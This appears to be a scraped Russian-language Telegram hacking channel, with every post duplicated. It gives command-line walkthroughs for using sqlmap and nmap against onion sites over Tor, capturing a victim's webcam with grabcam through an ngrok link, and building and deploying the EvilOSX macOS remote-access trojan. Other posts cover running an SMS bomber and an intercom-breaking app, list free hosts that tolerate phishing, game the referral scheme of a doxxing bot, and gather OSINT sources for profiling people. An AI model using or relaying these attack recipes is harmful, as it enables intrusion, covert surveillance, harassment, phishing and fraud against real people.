Адаптируем инструменты под атаки на onion-сайты
Несмотря на свою скрытность и шифрование, сайты в сети Tor работают практически также как и в clearnet. Соответственно на них также могут присутствовать различные уязвимости, с помощью которых можно нарушить работу ресурса или деанонимизировать его создателя, к примеру. А если некоторые процессы проведения атак универсальны для обоих типов сайтов, то и некоторые популярные инструменты можно также адаптировать для работы в даркнете. Рассмотрим, для примера, как настроить sqlmap и nmap для работы в сети Tor.
Установка:
$ sudo apt instal tor nmap proxychains
Делаем sqlmap анонимной:
1. Для начала запускаем сам Tor:
$ tor
2. Теперь мы можем выполнять команды просто дописывая в конец: "--tor --tor-type=SOCKS5":
$ python2 sqlmap.py -u http://test.onion/index.php?id=2 --tor --tor-type=SOCKS5
Анонимизируем сканирование nmap:
Для анонимизации сканирования через nmap используйте дополнительную утилиту "ProxyChains":
$ apt install proxychains
По умолчанию proxychains уже настроен на работу с Tor, поэтому для начала стандартного сканирования нужно ввести команду:
$ proxychains nmap -sT -PN -n -sV -p 21 test2vy6foxjlzsh.onion
Несмотря на свою скрытность и шифрование, сайты в сети Tor работают практически также как и в clearnet. Соответственно на них также могут присутствовать различные уязвимости, с помощью которых можно нарушить работу ресурса или деанонимизировать его создателя, к примеру. А если некоторые процессы проведения атак универсальны для обоих типов сайтов, то и некоторые популярные инструменты можно также адаптировать для работы в даркнете. Рассмотрим, для примера, как настроить sqlmap и nmap для работы в сети Tor.
Установка:
$ sudo apt instal tor nmap proxychains
Делаем sqlmap анонимной:
1. Для начала запускаем сам Tor:
$ tor
2. Теперь мы можем выполнять команды просто дописывая в конец: "--tor --tor-type=SOCKS5":
$ python2 sqlmap.py -u http://test.onion/index.php?id=2 --tor --tor-type=SOCKS5
Анонимизируем сканирование nmap:
Для анонимизации сканирования через nmap используйте дополнительную утилиту "ProxyChains":
$ apt install proxychains
По умолчанию proxychains уже настроен на работу с Tor, поэтому для начала стандартного сканирования нужно ввести команду:
$ proxychains nmap -sT -PN -n -sV -p 21 test2vy6foxjlzsh.onion
👍1
OpenDomofon PRO 2.0.apk
12.2 MB
Открываем любую дверь в подъезд!
В жизни порой бывает необходимость попасть в подъезд, но не всегда есть от него ключи.. На этот случай энтузиасты придумали свое приложение .
OpenDomofon - это море всевозможной информации по практически всём видам домофонов от инструкции, до способа взломать.
В жизни порой бывает необходимость попасть в подъезд, но не всегда есть от него ключи.. На этот случай энтузиасты придумали свое приложение .
OpenDomofon - это море всевозможной информации по практически всём видам домофонов от инструкции, до способа взломать.
Полностью анонимная почта!
Салют! Сегодня мы хотели бы рассказать вам об одном отличном сервисе анонимной почты, под названием MailFence
https://mailfence.com/
MailFence - это бельгийский сервис электронной почты без любого возможного трекинга, сбора информации и рекламы. Сервис имеет поддержку шифрования GnuPrivacy Guard (GPG), что и не дает возможность выдать данные пользователей третьим лицам.
Сама по себе базовая учетная запись бесплатная, но можно докупить себе больше места и расширенную техподдержку.
Салют! Сегодня мы хотели бы рассказать вам об одном отличном сервисе анонимной почты, под названием MailFence
https://mailfence.com/
MailFence - это бельгийский сервис электронной почты без любого возможного трекинга, сбора информации и рекламы. Сервис имеет поддержку шифрования GnuPrivacy Guard (GPG), что и не дает возможность выдать данные пользователей третьим лицам.
Сама по себе базовая учетная запись бесплатная, но можно докупить себе больше места и расширенную техподдержку.
Mailfence
Secure and private email | Mailfence encrypted email service
Mailfence is the only secure and private email service that gives you control. A free, interoperable encrypted email service protected by Belgian privacy law.
Как взломать вебку с помощью смартфона?
Сегодня рассмотрим реально рабочий хак камеры ноутбука или смартфона. Для того, чтобы всё получилось вам понадобится Android-смартфон с приложением Termux, 5 минут свободного времени и немного, чтобы потенциальная жертва открыла подготовленную нами ссылку.
После открытия termux вводим команды:
$ apt-get update -y
$ apt-get upgrade -y
$ pkg install python -y
$ pkg install python2 -y
$ pkg install wget -y
$ pip install lolcat
$ pkg install git -y
$ git clone https://github.com/noob-hackers/grabcam
$ cd grabcam
$ chmod +x grabcam.sh
$ bash grabcam.sh
После идем в настройки телефона, включаем моб. интернет и раздаем wi-fi. Вернувшись в termux, выбираем пункт Ngrok, копируем полученную ссылку, отправляем её жертве - всё!
Для того, чтобы посмотреть фотки вводим:
$ ls
$ termux-open camназваниевашейкартинки.png (у меня cam28Aug2020.png)
Сегодня рассмотрим реально рабочий хак камеры ноутбука или смартфона. Для того, чтобы всё получилось вам понадобится Android-смартфон с приложением Termux, 5 минут свободного времени и немного, чтобы потенциальная жертва открыла подготовленную нами ссылку.
После открытия termux вводим команды:
$ apt-get update -y
$ apt-get upgrade -y
$ pkg install python -y
$ pkg install python2 -y
$ pkg install wget -y
$ pip install lolcat
$ pkg install git -y
$ git clone https://github.com/noob-hackers/grabcam
$ cd grabcam
$ chmod +x grabcam.sh
$ bash grabcam.sh
После идем в настройки телефона, включаем моб. интернет и раздаем wi-fi. Вернувшись в termux, выбираем пункт Ngrok, копируем полученную ссылку, отправляем её жертве - всё!
Для того, чтобы посмотреть фотки вводим:
$ ls
$ termux-open camназваниевашейкартинки.png (у меня cam28Aug2020.png)
GitHub
GitHub - noob-hackers/grabcam: A tool to hack camera from termux for video tutorial visit youtube.com/noobhackers
A tool to hack camera from termux for video tutorial visit youtube.com/noobhackers - noob-hackers/grabcam
👍1
Бесплатные хостинги для поднятия фишинга и т.п.
Проверенные временем проекты, на которых можно разместить любой скам, фишинг, казино, фарм и любой другой проект, не опасаясь потерять доступ и бабки по инициативе админов хостинга.
Список:
▪️ www.awardspace.com
▪️ www.x10hosting.com
▪️ www.freehostia.com
▪️ www.freewebhostingarea.com
▪️ www.5gbfree.com
▪️ www.bravenet.com
▪️ www.free.sprinthost.ru
▪️ www.cyberbunker.ch
▪️ www.greyweb.ru (стоит 1 рубль и не банит фишинг)
Естественно, что данные варианты далеко не панацея. Конечно, лучше использовать какие-то специализированные хостинги, но есть одна проблема - они все платные и не дешёвые. А если с деньгами совсем туго, то и эти варианты подойдут на какое-то время.
Проверенные временем проекты, на которых можно разместить любой скам, фишинг, казино, фарм и любой другой проект, не опасаясь потерять доступ и бабки по инициативе админов хостинга.
Список:
▪️ www.awardspace.com
▪️ www.x10hosting.com
▪️ www.freehostia.com
▪️ www.freewebhostingarea.com
▪️ www.5gbfree.com
▪️ www.bravenet.com
▪️ www.free.sprinthost.ru
▪️ www.cyberbunker.ch
▪️ www.greyweb.ru (стоит 1 рубль и не банит фишинг)
Естественно, что данные варианты далеко не панацея. Конечно, лучше использовать какие-то специализированные хостинги, но есть одна проблема - они все платные и не дешёвые. А если с деньгами совсем туго, то и эти варианты подойдут на какое-то время.
Абузим бот для пробива Глаз Бога!
С недавнего времени, @okoproist_bot начал начислять по 1р за каждого реферала на внутренний счет вашего кошелька. Которым вы можете оплатить себе подписку. Например подписка на месяц стоит 289р, но мы замутим ее намного дешевле!
● Переходим в бота @okoproist_bot, заходим в раздел партнерская программа и копируем вашу реферальную ссылку.
● Далее идем в бота по накрутке @telemnogocombot пополняем баланс на 73р (Стоимость накрутки 1 бота на реф ссылку 0.25р)
● Запускаем накрут подписчиков на свою реф ссылку и ждем пока Глаз Бога начислит вам за всех рефов на ваш внутренний баланс!
Готово! Вместо 289р за месячную подписку, мы отдали всего 73р!
Так же можно не накручивать ботов, а например распространить ссыку по чатам и группам. За каждый переход по ссылке, бот так же будет платить по 1р.
Пользуйтесь, не благодарите!
С недавнего времени, @okoproist_bot начал начислять по 1р за каждого реферала на внутренний счет вашего кошелька. Которым вы можете оплатить себе подписку. Например подписка на месяц стоит 289р, но мы замутим ее намного дешевле!
● Переходим в бота @okoproist_bot, заходим в раздел партнерская программа и копируем вашу реферальную ссылку.
● Далее идем в бота по накрутке @telemnogocombot пополняем баланс на 73р (Стоимость накрутки 1 бота на реф ссылку 0.25р)
● Запускаем накрут подписчиков на свою реф ссылку и ждем пока Глаз Бога начислит вам за всех рефов на ваш внутренний баланс!
Готово! Вместо 289р за месячную подписку, мы отдали всего 73р!
Так же можно не накручивать ботов, а например распространить ссыку по чатам и группам. За каждый переход по ссылке, бот так же будет платить по 1р.
Пользуйтесь, не благодарите!
Создаем вирус удаленного доступа под MacOS
Из-за малого распространения устройств с MacOS создавать под неё вирусы не очень выгодно. Однако это не означает, что их нет. Придерживаться базовых правил кибербезопасности необходимо даже на такой защищенной ОС. Касательно различий вирусов, то сложные трояны подцепить вряд ли удастся, но стандартный Remote Administration Tool (RAT) вполне возможно. Для примера, сгенерировать подобный можно с помощью утилиты EvilOSX.
Установка:
git clone https://github.com/Marten4n6/EvilOSX
EvilOSX
Использование:
sudo python3 start.py
Вводим нужные настройки. Должен сгенерироваться файл, который в последующем отправляется на атакуемый ПК. Вот и все что требуется. В окне с сервером можно узнать список зараженных вписав команду clients. Для подключения к конкретному ПК нужно вписать команду connect <номер хоста>.
Из-за малого распространения устройств с MacOS создавать под неё вирусы не очень выгодно. Однако это не означает, что их нет. Придерживаться базовых правил кибербезопасности необходимо даже на такой защищенной ОС. Касательно различий вирусов, то сложные трояны подцепить вряд ли удастся, но стандартный Remote Administration Tool (RAT) вполне возможно. Для примера, сгенерировать подобный можно с помощью утилиты EvilOSX.
Установка:
git clone https://github.com/Marten4n6/EvilOSX
EvilOSX
Использование:
sudo python3 start.py
Вводим нужные настройки. Должен сгенерироваться файл, который в последующем отправляется на атакуемый ПК. Вот и все что требуется. В окне с сервером можно узнать список зараженных вписав команду clients. Для подключения к конкретному ПК нужно вписать команду connect <номер хоста>.
GitHub
GitHub - Marten4n6/EvilOSX: An evil RAT (Remote Administration Tool) for macOS / OS X.
An evil RAT (Remote Administration Tool) for macOS / OS X. - Marten4n6/EvilOSX
Топ поисковики для пробива
Продолжаем пополнять нашу коллекцию OSINT ресурсов, благодаря котором можно получить интересующую для нас информацию о человеке. Сегодня пройдемся по поиску в соц. сетях, форумах, репозиториях и в поисковиках сети Tor.
Поиск в любой социальной сети:
• kribrum.io — поиск в ВК, Facebook, ОК, Instagram, YouTube, Twitter, LiveJournal, ответы mailru, Telegram;
• go.mail.ru — поиск в ВК, ОК, Facebook, Instagram;
• recruitin.net — составляет Google дорки для поиска в LinkedIn, Dribbble, GitHub, Xing, Stack Overflow, Twitter
• social-searcher.com — поиск в ВК, Vimeo, Facebook, Instagram, Reddit, Flickr, YouTube, Twitter, Tumblr, Dailymotion
• https://cse.google.com/cse?cx=006976128084956795641:ad1xj14zfap — есть фильтр по дате, поиск в Facebook, Youtube, Twitter, Telegram, 4chan, 8Chan, Dailymotion, Reddit, VK, Linked, Instagram, Gab.
Поиск в форумах:
• boardreader.com — фильтры по домену, дате, языку, времени и типу;
• 4chansearch.com — поиск через Google CSE;
• 4plebs.org — архив 4chan, есть расширенный поиск.
Поиск в Pastebin через URL:
• https://psbdmp.ws/api/v3/search/ANYTHING — сайт даст ID записи pastebin где был найден фрагмент текста, замените ANYTHING на любые данные
Поиск в репозиториях с кодом:
• grep.app — есть поддержка регулярных выражений, поиск в GitHub;
• searchcode.com — 11 источников поиска;
• codefinder.org — фильтры по расширению файла.
Поиск IoT и не только:
• www.zoomeye.org — найдет IP, открытые порты, номер автономной системы, и т.д.
• viz.greynoise.io;
• onyphe.io;
• fofa.so;
• maltiverse.com;
• insecam.org — найдет камеры видеонаблюдения.
Поиск в файлообменниках:
• www.4shared.com — фильтр по размеру, алфавиту и дате загрузки;
• filechef.com — создает дорки для Google;
• filesearch.link — поиск в google по доменам более 30 файлообменников;
• osint.sh — файлы в общедоступных серверах AWS S3;
• buckets.grayhatwarfare.com — файлы в общедоступных серверах AWS S3.
Поисковики в сети Tor:
• QUO • tordex • OSS • EvoSearch • SearchDemon • Phobos • Tor66 (mirror) • Tornet Global Search • Torgle • Submarine • Ahmia Search • ExcavaTOR • Raklet • Kilos Search • Recon • Tormax • SeИtoЯ • haystak • Torch • Our Realm • OnionLand Search
Продолжаем пополнять нашу коллекцию OSINT ресурсов, благодаря котором можно получить интересующую для нас информацию о человеке. Сегодня пройдемся по поиску в соц. сетях, форумах, репозиториях и в поисковиках сети Tor.
Поиск в любой социальной сети:
• kribrum.io — поиск в ВК, Facebook, ОК, Instagram, YouTube, Twitter, LiveJournal, ответы mailru, Telegram;
• go.mail.ru — поиск в ВК, ОК, Facebook, Instagram;
• recruitin.net — составляет Google дорки для поиска в LinkedIn, Dribbble, GitHub, Xing, Stack Overflow, Twitter
• social-searcher.com — поиск в ВК, Vimeo, Facebook, Instagram, Reddit, Flickr, YouTube, Twitter, Tumblr, Dailymotion
• https://cse.google.com/cse?cx=006976128084956795641:ad1xj14zfap — есть фильтр по дате, поиск в Facebook, Youtube, Twitter, Telegram, 4chan, 8Chan, Dailymotion, Reddit, VK, Linked, Instagram, Gab.
Поиск в форумах:
• boardreader.com — фильтры по домену, дате, языку, времени и типу;
• 4chansearch.com — поиск через Google CSE;
• 4plebs.org — архив 4chan, есть расширенный поиск.
Поиск в Pastebin через URL:
• https://psbdmp.ws/api/v3/search/ANYTHING — сайт даст ID записи pastebin где был найден фрагмент текста, замените ANYTHING на любые данные
Поиск в репозиториях с кодом:
• grep.app — есть поддержка регулярных выражений, поиск в GitHub;
• searchcode.com — 11 источников поиска;
• codefinder.org — фильтры по расширению файла.
Поиск IoT и не только:
• www.zoomeye.org — найдет IP, открытые порты, номер автономной системы, и т.д.
• viz.greynoise.io;
• onyphe.io;
• fofa.so;
• maltiverse.com;
• insecam.org — найдет камеры видеонаблюдения.
Поиск в файлообменниках:
• www.4shared.com — фильтр по размеру, алфавиту и дате загрузки;
• filechef.com — создает дорки для Google;
• filesearch.link — поиск в google по доменам более 30 файлообменников;
• osint.sh — файлы в общедоступных серверах AWS S3;
• buckets.grayhatwarfare.com — файлы в общедоступных серверах AWS S3.
Поисковики в сети Tor:
• QUO • tordex • OSS • EvoSearch • SearchDemon • Phobos • Tor66 (mirror) • Tornet Global Search • Torgle • Submarine • Ahmia Search • ExcavaTOR • Raklet • Kilos Search • Recon • Tormax • SeИtoЯ • haystak • Torch • Our Realm • OnionLand Search
🧨 Самый мощный SMS-бомбер в Termux!
На днях известный разработчик в узких кругах (kreo79) анонсировал свой новый бомбер. Лично мне пришло около 40 смс за 5 минут. В общем-то довольно неплохо, особенно учитывая что он работает не только на русские номера, но и на весь СНГ.
Установка:
$ git clone https://github.com/kreo79/PROsmsbomb/
$ cd PROsmsbomb
$ pip install requests
Использование:
$ python smswiththreading.py
Вся информация предоставлена исключительно с целью ознакомления. Мы не несём ответственности за ваши действия.
На днях известный разработчик в узких кругах (kreo79) анонсировал свой новый бомбер. Лично мне пришло около 40 смс за 5 минут. В общем-то довольно неплохо, особенно учитывая что он работает не только на русские номера, но и на весь СНГ.
Установка:
$ git clone https://github.com/kreo79/PROsmsbomb/
$ cd PROsmsbomb
$ pip install requests
Использование:
$ python smswiththreading.py
Вся информация предоставлена исключительно с целью ознакомления. Мы не несём ответственности за ваши действия.
👍1